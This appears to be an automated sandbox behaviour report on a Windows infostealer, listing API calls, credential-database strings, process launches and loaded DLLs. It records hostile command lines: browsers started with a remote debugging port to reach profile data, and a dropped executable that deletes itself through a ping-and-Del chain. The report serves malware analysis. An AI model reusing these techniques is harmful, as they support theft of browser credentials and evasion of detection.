Source: DbMBWMxoNv.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RoamingEBFBKKJECA.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: LedgerUpdater[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@74/307@26/27

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_6CF30300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CF30300

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00418810

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00413970

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\LT54TFHJ.htm

Jump to behavior

Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8440:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6456

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user~1\AppData\Local\Temp\dd6412fa-a253-4b99-b622-a1f8fcded6b4.tmp

Jump to behavior

Source: DbMBWMxoNv.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400514000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: DbMBWMxoNv.exe, DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: DbMBWMxoNv.exe, 00000000.00000003.1694663642.000000002341D000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1542392351.000000002342B000.00000004.00000020.00020000.00000000.sdmp, CBAFCAKEHDHDHIDHDGDH.0.dr, CFCBFBGDBKJKECAAKKFH.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: DbMBWMxoNv.exe, 00000000.00000002.1929116790.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1922629404.000000001D3AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: DbMBWMxoNv.exe

ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\DbMBWMxoNv.exe "C:\Users\user\Desktop\DbMBWMxoNv.exe"
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2268,i,9271446851340455151,13328863685662980914,262144 /prefetch:8
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2804 --field-trial-handle=2496,i,9443240005397704202,6850762102566127394,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6796 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7040 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingEBFBKKJECA.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingEBFBKKJECA.exe "C:\Users\user\AppData\RoamingEBFBKKJECA.exe"
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\RoamingEBFBKKJECA.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 2432
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=2624 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingEBFBKKJECA.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2268,i,9271446851340455151,13328863685662980914,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2804 --field-trial-handle=2496,i,9443240005397704202,6850762102566127394,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6796 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7040 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=2624 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingEBFBKKJECA.exe "C:\Users\user\AppData\RoamingEBFBKKJECA.exe"
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\RoamingEBFBKKJECA.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: bcp47langs.dll
